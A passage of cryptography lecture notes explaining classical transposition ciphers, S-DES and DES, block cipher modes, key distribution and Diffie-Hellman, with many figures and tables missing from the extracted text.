then read off in rows. For example, using three "rails" and a message of “meet me after the
toga party” with a rail fence of
depth 2, we write the following:

The encrypted message is

MEMATRHTGPRYETEFETEOAAT
2. Route Cipher:
In a route cipher, the plaintext is first written out in a grid of given dimensions, then read off
in a pattern given in the key. For example, using the same plaintext that we used for rail
fence:
Ex1:

WRIORFEOE

EESVELANJ

ADCEDETCX

The key might specify "spiral inwards, clockwise, starting from the top right". That
would give a cipher text of:
EJXCTEDECDAEWRIORFEONALEVSE
Ex 2:
This sort of thing would be trivial to cryptanalyze. A more complex scheme is
to write the message in a rectangle, row by row, and read the message off, column by
column, but permute the order of the columns. The order of the columns then
becomes the key to the algorithm. For example,
Ciphertext:
TTNAAPTMTSUOAODWCOIXKNLYPETZ

Q5: Permutation Methods:

Permutation Ciphers There are two common techniques used to construct ciphers:
substitution and permutation. Substitution replaces plaintext letters or strings of letters by
letters or numbers or symbols. Permutation uses the plaintext message letters but
rearranges their order.
Affine ciphers, keyword ciphers, the Hill cipher, the Playfair cipher, and the Vigenère cipher
are all examples of substitution ciphers. Frequency analysis is a tool to identify the
substitutions. Frequency analysis of a ciphertext message that has been enciphered using a
permutation cipher reveals only plaintext frequencies. Consider the following plaintext
message.
monoalphabeticunilateralsubstitutionsystem
We will encipher it using a permutation that divides the message into 5-letter blocks,
monoa lphab eticu nilat erals ubsti tutio nsyst em
Because the numbers of the letters in the plaintext message is not a multiple of 5, the last
block must be padded. Padding must be chosen so that the person who receives the
ciphertext message and deciphers it can distinguish the message from the padding. In this
example, the last block is padded with x’s.
monoa lphab eticu nilat erals ubsti tutio nsyst emxxx
Then we rearrange the letters of the blocks according to the following permutation:

The letter in the first position of the block (on the left) moves to position 3, the letter in
position 2 moves to position 5, the letter in position 3 moves to position 4, the letter in
position 4 moves to position 1, and the letter in position 5 moves to position 2.
After the permutation is applied to the first block, we have:
When the permutation is applied to all the blocks, we obtain:
monoa lphab eticu nilat erals ubsti tutio nsyst emxxx
oamno ablhp cueit atnli lsear tiusb onttu stnys xxexm
So, the ciphertext message is
oamnoablhpcueitatnlilseartiusbonttustnysxxexm
If desired, the ciphertext can be divided into blocks for transmission. Here is a ciphertext
message enciphered using the 5-letter permutation give above.
THNROKEENRCKNUTIVYNUITESRXXYXX
The message is deciphered by applying the inverse of the permutation: The letter in the first
position of the block (on the left) moves to position 4, the letter in position 2 moves to
position 5, the letter in position 3 moves to position 1, the letter in position 4 moves to
position 3, and the letter in position 5 moves to position 2.

THNROKEENRCKNUTIVYNUITESRXXYXX
THNRO KEENR CKNUT IVYNU ITESR XXYXX
north ernke ntuck yuniv ersit yxxxx
 3. MODERN ENCRYPTION TECHNIQUES

Q1: SIMPLIFIED DATA ENCRYPTION STANDARD (S-DES)

The overall structure of the simplified DES. The S-DES encryption algorithm takes an 8-bit
block of plaintext (example: 10111101) and a 10-bit key as input and produces an 8-bit block
of ciphertext as output. The S-DES decryption algorithm takes an 8-bit block of ciphertext and
the same 10-bit key used to produce that ciphertext as input and produces the original 8-bit
block of plaintext.

The encryption algorithm involves five functions:

• an initial permutation (IP)

• a complex function labeled fk, which involves both permutation and substitution
operations and depends on a key input
• a simple permutation function that switches (SW) the two halves of the data
• the function fk again
• a permutation function that is the inverse of the initial permutation

The function fk takes as input not only the data passing through the encryption
algorithm, but also an 8-bit key. Here a 10-bit key is used from which two 8-bit subkeys
are generated. The key is first subjected to a permutation (P10). Then a shift operation
is performed. The output of the shift operation then passes through a permutation
 function that produces an 8-bit output (P8) for the first subkey (K1). The output of the
shift operation also feeds into another shift and another instance of P8 to produce the
second subkey (K2).

The encryption algorithm can be expressed as a composition composition1 of functions:

IP-1 ο fK2 ο SW ο fk1 ο IP

Which can also be written as

Ciphertext = IP-1 (fK2 (SW (fk1 (IP (plaintext)))))

Where

K1 = P8 (Shift (P10 (Key)))

K2 = P8 (Shift (shift (P10 (Key))))

Decryption can be shown as

Plaintext = IP-1 (fK1 (SW (fk2 (IP (ciphertext)))))

1. S-DES key generation

S-DES depends on the use of a 10-bit key shared between sender and receiver. From this
key, two 8-bit subkeys are produced for use in particular stages of the encryption and
decryption algorithm. First, permute the key in the following fashion. Let the 10-bit key be
designated as (k1, K2, k3, k4, k5, k6, k7, k8, k9, k10). Then the permutation P10 is defined
as:

P10 (k1, K2, k3, k4, k5, k6, k7, k8, k9, k10) = (k3, k5, K2, k7, k4, k10 10, k1, k9, k8, k6) P10
can be concisely defined by the display:

This table is read from left to right; each position in the table gives the identity of the input bit
that produces the output bit in that position. So the first output bit is bit 3 of the input; the
second output bit is bit 5 of the input, and so on. For example, the key (1010000010) is
permuted to (10000 01100). Next, perform a circular left shift (LS-1), or rotation, separately on
the first five bits and the second five bits. In our example, the result is (00001 11000). Next we
apply P8, which picks out and permutes 8 of the 10 bits according to the following rule:

The result is subkey 1 (K1). In our example, this yields (10100100). We then go back
to the pair of 5-bit strings produced by the two LS-1 functions and performs a circular
left shift of 2 bit positions on each string. In our example, the value (00001 11000)
becomes (00100 00011). Finally, P8 is applied again to produce K2. In our example,
the result is (01000011).

2 S-DES encryption

Encryption involves the sequential application of five functions.

Initial and Final Permutations

The input to the algorithm is an 8-bit block of plaintext, which we first permute using the IP
function:

This retains all 8 bits of the plaintext but mixes them up.
Consider the plaintext to be 11110011.

Permuted output = 10111101

At the end of the algorithm, the inverse permutation is used:

The Function fk
The most complex component of S-DES is the function fk, which consists of a combination of
permutation and substitution functions. The functions can be expressed as follows. Let L and
R be the leftmost 4 bits and rightmost 4 bits of the 8-bit input to f K, and let F be a mapping
(not necessarily one to one) from 4-bit strings to 4-bit strings. Then we let

We now describe the mapping F. The input is a 4-bit number (n1 n2 n3 n4). The first operation
is an expansion/permutation operation:

e.g., R= 1101

E/P output = 11101011

It is clearer to depict the result in this fashion:

The 8-bit subkey K1 = (k11, k12 12, k13 13, k14 14, k15 15, k16 16, k17 17, k18) is added to
this value using exclusive-OR:
 The first 4 bits (first row of the preceding matrix) are fed into the S-box S0 to produce
a 2- bit output, and the remaining 4 bits (second row) are fed into S1 to produce another
2-bit output.

These two boxes are defined as follows:

The S-boxes operate as follows. The first and fourth input bits are treated as a 2-bit number
that specify a row of the S-box, and the second and third input bits specify a column of the S-
box. The entry in that row and column, in base 2, is the 2-bit output. For example, if (p0,0 p0,3)
= ) (00) and ( p0,1 p0,2) = (10), then the output is from row 0, column 2 of S0, which is 3, or
(11) in ) binary. Similarly, (p1,0 p1,3) and ( p1,1 p1,2) are used to index into a row and column
of S1 to produce an additional 2 bits. Next, the 4 bits produced by S0 and S1 undergo a further
permutation as follows:

The output of P4 is the output of the function F.

3 The Switch Function

The function f K only alters the leftmost 4 bits of the input. The switch function (SW)
interchanges the left and right 4 bits so that the second instance of f K operates on a different
4 bits. In this second instance, the E/P, S0, S1, and P4 functions are the same. The key input
is K2. Finally apply inverse permutation to get the ciphertext.
Q2: DATA ENCRYPTION STANDARD (DES)
The Data Encryption Standard (DES) is a symmetric-key block cipher published by the
National Institute of Standards and Technology (NIST).
DES is an implementation of a Feistel Cipher. It uses 16 round Feistel structure. The block
size is 64-bit. Though, key length is 64-bit, DES has an effective key length of 56 bits, since 8
of the 64 bits of the key are not used by the encryption algorithm (function as check bits only).
General Structure of DES is depicted in the following illustration −

Since DES is based on the Feistel Cipher, all that is required to specify DES is −

• Round function
• Key schedule
• Any additional processing − Initial and final permutation
Initial and Final Permutation
The initial and final permutations are straight Permutation boxes (P-boxes) that are inverses
of each other. They have no cryptography significance in DES. The initial and final
permutations are shown as follows −
Round Function
The heart of this cipher is the DES function, f. The DES function applies a 48-bit key to the
rightmost 32 bits to produce a 32-bit output.

• Expansion Permutation Box − Since right input is 32-bit and round key is a
48-bit, we first need to expand right input to 48 bits. Permutation logic is
graphically depicted in the following illustration −

• The graphically depicted permutation logic is generally described as table in

DES specification illustrated as shown −
• XOR (Whitener). − After the expansion permutation, DES does XOR operation
on the expanded right section and the round key. The round key is used only in
this operation.
• Substitution Boxes. − The S-boxes carry out the real mixing (confusion). DES
uses 8 S-boxes, each with a 6-bit input and a 4-bit output. Refer the following
illustration −

• The S-box rule is illustrated below –

 • There are a total of eight S-box tables. The output of all eight s-boxes is then
combined in to 32 bit section.
• Straight Permutation − The 32 bit output of S-boxes is then subjected to the
straight permutation with rule shown in the following illustration:

Key Generation
The round-key generator creates sixteen 48-bit keys out of a 56-bit cipher key. The process
of key generation is depicted in the following illustration −

The logic for Parity drop, shifting, and Compression P-box is given in the DES description.
DES Analysis
The DES satisfies both the desired properties of block cipher. These two properties make
cipher very strong.
 • Avalanche effect − A small change in plaintext results in the very great change
in the ciphertext.
• Completeness − Each bit of ciphertext depends on many bits of plaintext.
During the last few years, cryptanalysis have found some weaknesses in DES when key
selected are weak keys. These keys shall be avoided.
DES has proved to be a very well designed block cipher. There have been no significant
cryptanalytic attacks on DES other than exhaustive key search.

Q3: MULTIPLE ENCRYPTION & DES

• clear a replacement for DES was needed

• theoretical attacks that can break it
• demonstrated exhaustive key search attacks
• AES is a new cipher alternative
• prior to this alternative was to use multiple encryption with DES implementations
• Triple-DES is the chosen form

Double-DES

• could use 2 DES encrypts on each block

C = EK2(EK1(P))

• issue of reduction to single stage and have “meet-in-the-middle” attack

• works whenever use a cipher twice
• since X = EK1(P) = DK2(C)
• attack by encrypting P with all keys and store
• then decrypt C with keys and match X value
• can show takes O(256) steps

Triple-DES with Two-Keys

• hence must use 3 encryptions

• would seem to need 3 distinct keys
• but can use 2 keys with E-D-E sequence

C = EK1(DK2(EK1(P)))

✓ nb encrypt & decrypt equivalent in security

✓ if K1=K2 then can work with single DES

• standardized in ANSI X9.17 & ISO8732

• no current known practical attacks

Triple-DES with Three-Keys

• although are no practical attacks on two key Triple-DES have some indications
• can use Triple-DES with Three-Keys to avoid even these
 C = EK3(DK2(EK1(P)))

• has been adopted by some Internet applications

• eg PGP, S/MIME

Q4: Block Cipher

BLOCK CIPHER PRINCIPLES

Virtually, all symmetric block encryption algorithms in current use are based on a structure
referred to as Fiestel block cipher. For that reason, it is important to examine the design
principles of the Fiestel cipher. We begin with a comparison of stream cipher with block cipher.

• A stream cipher is one that encrypts a digital data stream one bit or one byte at a time. E.g,
vigenere cipher. A block cipher is one in which a block of plaintext is treated as a whole and
used to produce a cipher text block of equal length. Typically a block size of 64 or 128 bits is
used.

Block cipher principles

• most symmetric block ciphers are based on a Feistel Cipher Structure

• needed since must be able to decrypt ciphertext to recover messages efficiently

• block ciphers look like an extremely large substitution

• would need table of 264 entries for a 64-bit block

• instead create from smaller building blocks

• using idea of a product cipher in 1949 Claude Shannon introduced idea of substitution-
permutation (S-P) networks called modern substitution-transposition product cipher these
form the basis of modern block ciphers

• S-P networks are based on the two primitive cryptographic operations we have seen
before:

• substitution (S-box)

• permutation (P-box)

• provide confusion and diffusion of message

• diffusion – dissipates statistical structure of plaintext over bulk of ciphertext

• confusion – makes relationship between ciphertext and key as complex as possible

Feistel cipher structure

The input to the encryption algorithm are a plaintext block of length 2w bits and a key K.
the plaintext block is divided into two halves L0 and R0. The two halves of the data pass
through

“ n “ rounds of processing and then combine to produce the ciphertext block. Each round “ i “
has inputs Li-1 and Ri-1, derived from the previous round, as well as the subkey Ki, derived
from the overall key K. in general, the subkeys Ki are different from K and from each other.

All rounds have the same structure. A substitution is performed on the left half of the data

(as similar to S-DES). This is done by applying a round function F to the right half of the data

and then taking the XOR of the output of that function and the left half of the data. The round

function has the same general structure for each round but is parameterized by the round
subkey ki. Following this substitution, a permutation is performed that consists of the
interchange of the two halves of the data. This structure is a particular form of the substitution-
permutation network.

The exact realization of a Feistel network depends on the choice of the following
parameters and design features:

Block size - Increasing size improves security, but slows cipher

Key size - Increasing size improves security, makes exhaustive key searching harder, but
may slow cipher

Number of rounds - Increasing number improves security, but slows cipher

Subkey generation - Greater complexity can make analysis harder, but slows cipher

Round function - Greater complexity can make analysis harder, but slows cipher

Fast software en/decryption & ease of analysis - are more recent concerns for practical
use and testing.

The process of decryption is essentially the same as the encryption process. The rule is as
follows: use the cipher text as input to the algorithm, but use the subkey ki in reverse order.
i.e., Kn in the first round, Kn-1 in second round and so on. For clarity, we use the notation LEi
and Rei for data traveling through the decryption algorithm. The diagram below indicates that,
at each round, the intermediate value of the decryption process is same (equal) to the
corresponding value of the encryption process with two halves of the value swapped.

i.e., REi || LEi (or) equivalently RD16-I || LD16-i

After the last iteration of the encryption process, the two halves of the output are swapped, so
that the cipher text is RE16 || LE16. The output of that round is the cipher text. Now take the
cipher text and use it as input to the same algorithm. The input to the first round is RE16 ||
LE16, which is equal to the 32-bit swap of the output of the sixteenth round of the encryption
process.
Output(ciphertext)

Fig: Feistel Encryption & Decryption

Q5: Block Cipher Design Principles – Block Cipher Modes Of Operation
Block ciphers are built in the Feistel cipher structure. Block cipher has a specific number
of rounds and keys for generating ciphertext. For defining the complexity level of an
algorithm few design principles are to be considered.
These are explained as following below :
1. Number of Rounds –
The number of Rounds is regularly considered in design criteria, it just reflects
the number of rounds to be suitable for an algorithm to make it more complex,
in DES we have 16 rounds ensuring it to be more secure while in AES we have
10 rounds which makes it more secure.
2. Design of function F –
The core part of the Feistel Block cipher structure is the Round Function. The
complexity of cryptanalysis can be derived from the Round function i.e. the
increasing level of complexity for the round function would be greatly
contributing to an increase in complexity.
To increase the complexity of the round function, the avalanche effect is also
included in the round function, as the change of a single bit in plain text would
produce a mischievous output due to the presence of avalanche effect.
3. Key schedule algorithm –
In Feistel Block cipher structure, each round would generate a sub-key for
increasing the complexity of cryptanalysis. The Avalanche effect makes it more
complex in deriving sub-key. Decryption must be done very carefully to get the
actual output as the avalanche effect is present in it.
Encryption algorithms are divided into two categories based on the input type, as a block
cipher and stream cipher. Block cipher is an encryption algorithm that takes a fixed size
of input say b bits and produces a ciphertext of b bits again. If the input is larger than b bits
it can be divided further. For different applications and uses, there are several modes of
operations for a block cipher.
Electronic Code Book (ECB) –
Electronic code book is the easiest block cipher mode of functioning. It is easier because
of direct encryption of each block of input plaintext and output is in form of blocks of
encrypted ciphertext. Generally, if a message is larger than b bits in size, it can be broken
down into a bunch of blocks and the procedure is repeated.
Procedure of ECB is illustrated below:

Advantages of using ECB –

• Parallel encryption of blocks of bits is possible, thus it is a faster way of
encryption.
• Simple way of the block cipher.
Disadvantages of using ECB –
• Prone to cryptanalysis since there is a direct relationship between plaintext and
ciphertext.
Cipher Block Chaining –
Cipher block chaining or CBC is an advancement made on ECB since ECB compromises
some security requirements. In CBC, the previous cipher block is given as input to the next
encryption algorithm after XOR with the original plaintext block. In a nutshell here, a cipher
block is produced by encrypting an XOR output of the previous cipher block and present
plaintext block.

Advantages of CBC –
• CBC works well for input greater than b bits.
• CBC is a good authentication mechanism.
• Better resistive nature towards cryptanalysis than ECB.
Disadvantages of CBC –
Parallel encryption is not possible since every encryption requires a previous cipher
The process is illustrated here:
.
Cipher Feedback Mode (CFB) –
In this mode the cipher is given as feedback to the next block of encryption with some new
specifications: first, an initial vector IV is used for first encryption and output bits are
divided as a set of s and b-s bits.The left-hand side s bits are selected along with plaintext
bits to which an XOR operation is applied. The result is given as input to a shift register
having b-s bits to lhs,s bits to rhs and the process continues. The encryption and
decryption process for the same is shown below, both of them use encryption algorithms.
Advantages of CFB –
• Since, there is some data loss due to the use of shift register, thus it is difficult
for applying cryptanalysis.
Disadvantages of using ECB –
• The drawbacks of CFB are the same as those of CBC mode. Both block losses
and concurrent encryption of several blocks are not supported by the
encryption. Decryption, however, is parallelizable and loss-tolerant.

Output Feedback Mode –

The output feedback mode follows nearly the same process as the Cipher Feedback mode
except that it sends the encrypted output as feedback instead of the actual cipher which is
XOR output. In this output feedback mode, all bits of the block are sent instead of sending
selected s bits. The Output Feedback mode of block cipher holds great resistance towards
bit transmission errors. It also decreases the dependency or relationship of the cipher on
the plaintext.

Advantages of OFB –
• In the case of CFB, a single bit error in a block is propagated to all subsequent
blocks. This problem is solved by OFB as it is free from bit errors in the plaintext
block.
Disadvantages of OFB-
• The drawback of OFB is that, because to its operational modes, it is more
susceptible to a message stream modification attack than CFB.
Counter Mode –
The Counter Mode or CTR is a simple counter-based block cipher implementation. Every
time a counter-initiated value is encrypted and given as input to XOR with plaintext which
results in ciphertext block. The CTR mode is independent of feedback use and thus can be
implemented in parallel.
Its simple implementation is shown below:

Advantages of Counter –
• Since there is a different counter value for each block, the direct plaintext and
ciphertext relationship is avoided. This means that the same plain text can map
to different ciphertext.
• Parallel execution of encryption is possible as outputs from previous stages are
not chained as in the case of CBC.
Disadvantages of Counter-
• The fact that CTR mode requires a synchronous counter at both the transmitter
and the receiver is a severe drawback. The recovery of plaintext is erroneous
when synchronisation is lost.

Q6: IDEA – Security issues involved with these methods

IDEA stands for International Data Encryption Algorithm. IDEA is a block cipher invented by
James Massey and Xuejia Lai and was first defined in 1991. It uses 128 bit key length which
works on 64 bit blocks.
It includes a series of eight identical transformations depend upon bitwise exclusiveor,
addition and multiplication modules. It is based upon symmetric cipher and has very weak
key design approach therefore security level of the algorithm is very underprivileged as
compared to the DES. IDEA not becomes so much famous because of its complex structure.
 4. CONFIDENTIALITY USING CONVENTIONAL ENCRYPTION

Q1: PLACEMENT OF ENCRYPTION:

If encryption is to be used to counter attacks on confidentiality, we need to decide
what to encrypt and where the encryption function should be located. To begin, this section
examines the potential locations of security attacks and then looks at the two major
approaches to encryption placement: link and end to end.
There are a large number of locations at which an attack can occur. Furthermore, for
wide area communications, many of these locations are not under the physical control of the
end user. Even in the case of local area networks, in which physical security measures are
possible, there is always the threat of the disgruntled employee.
Link versus End-to-End Encryption
The most powerful and most common approach to securing the points of vulnerability
highlighted in the preceding section is encryption. If encryption is to be used to counter these
attacks, then we need to decide what to encrypt and where the encryption gear should be
located. There are two fundamental alternatives: link encryption and end-to-end encryption.

Basic Approaches
Link to Link Encryption:
With link encryption, each vulnerable communications link is
equipped on both ends with an encryption device. Thus, all traffic over all communications
links is secured. One of its disadvantages is that the message must be decrypted each time
it enters a switch because the switch must read the address (logical connection number) in
the packet header in order to route the frame. Thus, the message is vulnerable at each
switch. If working with a public network, the user has no control over the security of the
nodes.
Several implications of link encryption should be noted. For this
strategy to be effective, all the potential links in a path from source to destination must use
link encryption. Each pair of nodes that share a link should share a unique key, with a
different key used on each link. Thus, many keys must be provided.
End-To-End Encryption
With end-to-end encryption, the encryption process is carried out
at the two end systems. The source host or terminal encrypts the data. The data in
encrypted form are then transmitted unaltered across the network to the destination terminal
or host. The destination shares a key with the source and so is able to decrypt the data. This
plan seems to secure the transmission against attacks on the network links or switches.
Thus, end-to-end encryption relieves the end user of concerns about the degree of security
of networks and links that support the communication. There is, however, still a weak spot.
Consider the following situation. A host connects to a frame relay
or ATM network, sets up a logical connection to another host, and is prepared to transfer
data to that other host by using end-to-end encryption. Data are transmitted over such a
network in the form of packets that consist of a header and some user data. What part of
each packet will the host encrypt? Suppose that the host encrypts the entire packet,
including the header. This will not work because, remember, only the other host can perform
the decryption. The frame relay or ATM switch will receive an encrypted packet and be
unable to read the header. Therefore, it will not be able to route the packet. It follows that the
host may encrypt only the user data portion of the packet and must leave the header in the
clear.
Thus, with end-to-end encryption, the user data are secure.
However, the traffic pattern is not, because packet headers are transmitted in the clear. On
the other hand, end-to-end encryption does provide a degree of authentication. If two end
systems share an encryption key, then a recipient is assured that any message that it
receives comes from the alleged sender, because only that sender shares the relevant key.
Such authentication is not inherent in a link encryption scheme.
To achieve greater security, both link and end-to-end encryption
are needed, as is shown in Figure 7.2. When both forms of encryption are employed, the
host encrypts the user data portion of a packet using an end-to-end encryption key. The
entire packet is then encrypted using a link encryption key. As the packet traverses the
network, each switch decrypts the packet, using a link encryption key to read the header,
and then encrypts the entire packet again for sending it out on the next link. Now the entire
packet is secure except for the time that the packet is actually in the memory of a packet
switch, at which time the packet header is in the clear.
Logical Placement of End-to-End Encryption Function
With link encryption, the encryption function is performed at a low
level of the communications hierarchy i.e. physical or link layers.
For end-to-end encryption, several choices are possible for the
logical placement of the encryption function. At the lowest practical level, the encryption
function could be performed at the network layer.
With network-layer encryption, Each end system can engage in an
encrypted exchange with another end system if the two share a secret key. All the user
processes and applications within each end system would employ the same encryption
scheme with the same key to reach a particular target end system.
Figure 7.4 illustrates the issues involved. In this example, an
electronic mail gateway is used to interconnect an internetwork that uses a TCP/IP-based
architecture. In such a configuration, there is no end-to-end protocol below the application
layer. The transport and network connections from each end system terminate at the mail
gateway, which sets up new transport and network connections to link to the other end
system. Even if both end systems use TCP/IP or OSI, there are plenty of instances in actual
configurations in which mail gateways sit between otherwise isolated internetworks. Thus,
for applications like electronic mail that have a store-and-forward capability, the only place to
achieve end-to-end encryption is at the application layer.
A drawback of application-layer encryption is that the number of entities to consider
increases dramatically. A network that supports hundreds of hosts may support thousands of
users and processes. Thus, many more secret keys need to be generated and distributed.
An interesting way of viewing the alternatives is to note that as we move up the
communications hierarchy, less information is encrypted but it is more secure.
 With application-level encryption (Figure 7.5a), only the user data
portion of a TCP segment is encrypted. The TCP, IP, network-level, and link-level headers
and link-level trailer are in the clear. By contrast, if encryption is performed at the TCP level
(Figure 7.5b), then, on a single end-to-end connection, the user data and the TCP header
are encrypted. The IP header remains in the clear because it is needed by routers to route
the IP datagram from source to destination.
Note, however, that if a message passes through a gateway, the
TCP connection is terminated and a new transport connection is opened for the next hop.
Furthermore, the gateway is treated as a destination by the underlying IP. Thus, the
encrypted portions of the data unit are decrypted at the gateway. If the next hop is over a
TCP/IP network, then the user data and TCP header are encrypted again before
transmission. However, in the gateway itself the data unit is buffered entirely in the clear.
Finally, for link-level encryption (Figure 7.5c), the entire data unit except for the link header
and trailer is encrypted on each link, but the entire data unit is in the clear at each router and
gateway.

Q2: Traffic Confidentiality:

The following types of information that can be derived from a traffic analysis attack:
• Identities of partners
• How frequently the partners are communicating
• Message pattern, message length, or quantity of messages that suggest important
information is being exchanged
• The events that correlate with special conversations between particular partners
Another concern related to traffic is the use of traffic patterns to
create a covert channel. Typically, the channel is used to transfer information in a way that
violates a security policy. For example, an employee may wish to communicate information
to an outsider in a way that is not detected by management and that requires simple
eavesdropping on the part of the outsider.
Link Encryption Approach
With the use of link encryption, network-layer headers (e.g., frame
or cell header) are encrypted, reducing the opportunity for traffic analysis. However, it is still
possible in those circumstances for an attacker to assess the amount of traffic on a network
and to observe the amount of traffic entering and leaving each end system. An effective
countermeasure to this attack is traffic padding, illustrated in Figure 7.6.
Traffic padding produces ciphertext output continuously, even in
the absence of plaintext. A continuous random data stream is generated. When plaintext is
available, it is encrypted and transmitted. When input plaintext is not present, random data
are encrypted and transmitted. This makes it impossible for an attacker to distinguish
between true data flow and padding and therefore impossible to deduce the amount of
traffic.
End-to-End Encryption Approach
Traffic padding is essentially a link encryption function. If only end-
to-end encryption is employed, then the measures available to the defender are more
limited. For example, if encryption is implemented at the application layer, then an opponent
can determine which transport entities are engaged in dialogue.
One technique that might prove useful is to pad out data units to a
uniform length at either the transport or application level. In addition, null messages can be
inserted randomly into the stream. These tactics deny an opponent knowledge about the
amount of data exchanged between end users and obscure the underlying traffic pattern.

Q3: Key Distribution :

For symmetric encryption to work, the two parties to an exchange must
share the same key, and that key must be protected from access by others. Furthermore, frequent
key changes are usually desirable to limit the amount of data compromised if an attacker learns the
key. Therefore, the term that refers to the means of delivering a key to two parties who wish to
exchange data, without allowing others to see the key. For two parties A and B, key distribution can
be achieved in a number of ways, as follows:

1. A can select a key and physically deliver it to B.

2. A third party can select the key and physically deliver it to A and B.

3. If A and B have previously and recently used a key, one party can
transmit the new key to the other, encrypted using the old key.

4. If A and B each has an encrypted connection to a third party C, C can

deliver a key on the encrypted links to A and B.

Physical delivery (1 & 2) is simplest - but only applicable when there is

personal contact between recipient and key issuer. This is fine for link encryption where devices &
keys occur in pairs, but does not scale as number of parties who wish to communicate grows. 3 is
mostly based on 1 or 2 occurring first.
 A third party, whom all parties trust, can be used as a trusted
intermediary to mediate the establishment of secure communications between them (4). Must trust
intermediary not to abuse the knowledge of all session keys. As number of parties grow, some
variant of 4 is only practical solution to the huge growth in number of keys potentially needed.

Key distribution centre:

• The use of a key distribution center is based on the use of a hierarchy of keys. At a minimum, two
levels of keys are used.

• Communication between end systems is encrypted using a temporary key, often referred to as a
session key.

• Typically, the session key is used for the duration of a logical connection and then discarded

• master key is shared by the key distribution center and an end system or user and used to encrypt
the session key.

Let us assume that user A wishes to establish a logical connection

with B and requires a one-time session key to protect the data transmitted over the
connection. A has a master key, Ka , known only to itself and the KDC; similarly, B shares
the master key Kb with the KDC. The following steps occur:
 ❖ A issues a request to the KDC for a session key to protect a logical connection to B.
The message includes the identity of A and B and a unique identifier, N1, for this
transaction, which we refer to as a nonce. The nonce may be a timestamp, a counter,
or a random number; the minimum requirement is that it differs with each request.
Also, to prevent masquerade, it should be difficult for an opponent to guess the
nonce. Thus, a random number is a good choice for a nonce.

❖ The KDC responds with a message encrypted using Ka Thus, A is the only one who
can successfully read the message, and A knows that it originated at the KDC. The
message includes two items intended for A:
• The one-time session key, Ks, to be used for the session
• The original request message, including the nonce, to enable A to match this response
with the appropriate request
Thus, A can verify that its original request was not altered before
reception by the KDC and, because of the nonce, that this is not a replay of some previous
request.
In addition, the message includes two items intended for B:
• The one-time session key, Ks to be used for the session
• An identifier of A (e.g., its network address), IDA
These last two items are encrypted with Kb (the master key that the KDC shares with B).
They are to be sent to B to establish the connection and prove A's identity.

❖ A stores the session key for use in the upcoming session and forwards to B the
information that originated at the KDC for B, namely, E(Kb, [Ks || IDA]). Because this
information is encrypted with Kb, it is protected from eavesdropping. B now knows
the session key (Ks), knows that the other party is A (from IDA), and knows that the
information originated at the KDC (because it is encrypted using Kb).
At this point, a session key has been securely delivered to A and B, and they may begin their
protected exchange. However, two additional steps are desirable:
❖ Using the newly minted session key for encryption, B sends a nonce, N2, to A.
❖ Also using Ks , A responds with f(N2), where f is a function that performs some
transformation on N2 (e.g., adding one).
These steps assure B that the original message it received (step 3) was not a replay.
Note that the actual key distribution involves only steps 1 through 3 but that steps 4 and 5,
as well as 3, perform an authentication function.
Major Issues with KDC:
For very large networks, a hierarchy of KDCs can be established.
For communication among entities within the same local domain, the local KDC is
responsible for key distribution. If two entities in different domains desire a shared key, then
the corresponding local KDCs can communicate through a (hierarchy of) global KDC(s)
 To balance security & effort, a new session key should be used for
each new connection-oriented session. For a connectionless protocol, a new session key is
used for a certain fixed period only or for a certain number of transactions.
An automated key distribution approach provides the flexibility and
dynamic characteristics needed to allow a number of terminal users to access a number of
hosts and for the hosts to exchange data with each other, provided they trust the system to
act on their behalf.
The use of a key distribution center imposes the requirement that
the KDC be trusted and be protected from subversion. This requirement can be avoided if
key distribution is fully decentralized.
In addition to separating master keys from session keys, may wish
to define different types of session keys on the basis of use.

Q4: Random Number Generation:

The generation of random numbers is essential to cryptography. One of the most difficult aspect
of cryptographic algorithms is in depending on or generating, true random information. This is
problematic, since there is no known way to produce true random data, and most especially no
way to do so on a finite state machine such as a computer.
There are generally two kinds of random number generators: non-deterministic random number
generators, sometimes called "true random number generators" (TRNG), and deterministic
random number generators, also called pseudorandom number generators (PRNG).
Many high-quality cryptosystems use both -- a hardware random-number generator to
periodically re-seed a deterministic random number generator.
Quantum mechanical theory suggests that some physical processes are inherently random
(though collecting and using such data presents problems), but deterministic mechanisms, such
as computers, cannot be. Any stochastic process (generation of random numbers) simulated on
a computer, however, is not truly random, but only pseudorandom.
Within the limitations of pseudorandom generators, any quality pseudorandom number generator
must:

• have a uniform distribution of values, in all dimensions

• have no detectable pattern, ie generate numbers with no correlations between
successive numbers
• have a very long cycle length
• have no, or easily avoidable, weak initial conditions which produce patterns or short
cycles

Q5: Diffie – Hellman Key Exchange

The purpose of the algorithm is to enable two users to exchange a key securely that can
then be used for subsequent encryption of messages.

The Diffie-Hellman algorithm depends for its effectiveness on the difficulty of computing
The result is that two sides have exchanged a secret key.

The security of the algorithm lies in the fact that, while it is relatively easy to calculate
exponentials modulo a prime, it is very difficult to calculate discrete logarithms. For large
primes, the latter task is considered infeasible.
 Diffie-Hellman Key Exchange
The protocol depicted in figure is insecure against a man-in-the-middle attack. Suppose
Alice and Bob wish to exchange keys, and Darth is the adversary. The attack proceeds as
follows:

simply wants to eavesdrop on the communication without altering it.

In the second case, Darth wants to modify the message going to Bob. The key exchange
protocol is vulnerable to such an attack because it does not authenticate the participants.
This vulnerability can be overcome with the use of digital signatures and public-key
certificates.
 5. INTRODUCTION TO NUMBER THEORY

Q1: DIVISIBILITY AND THE DIVISION ALGORITHM (Refer Notes)

Divisibility
We say that a nonzero b divides a if a = mb for some m, where a, b, and m are integers.
That is, b divides a if there is no remainder on division. The notation b | a is
commonly used to mean b divides a. Also, if b | a, we say that b is a divisor of a.

Subsequently, we will need some simple properties of divisibility for integers,

which are as follows:
The Division Algorithm
Given any positive integer n and any nonnegative integer a, if we divide a by n, we get an
integer quotient q and an integer remainder r that obey the following relationship:

where |x | is the largest integer less than or equal to x. Equation (4.1) is referred to as the division
algorithm.
Figure 4.1a demonstrates that, given a and positive n, it is always
possible to find q and r that satisfy the preceding relationship.
Represent the integers on the number line; a will fall somewhere on that
line (positive a is shown, a similar demonstration can be made for negative a). Starting at
0, proceed to n, 2n, up to qn, suchthat qn <=a and(q +1)n > a. The distance from qn to a
is r, and we have found the unique values of q and r. The remainder r is often referred to as
a residue.
Q2: The Euclidean Algorithm & Extended Euclidean Algorithm (Refer Notes)

Q3: Modular Arithmetic (Refer Notes)

Q4: Prime No.s (Refer Notes)

Q5: Fermet’s & Euler’s Theorem (Refer Notes)

Q6: Testing for Primality (Refer Notes)

Q7: The Chinese Remainder Theorem (Refer Notes)

 6. PUBLIC KEY CRYPTOGRAPHY

Q1: Principles of Public-key Cryptosystems:

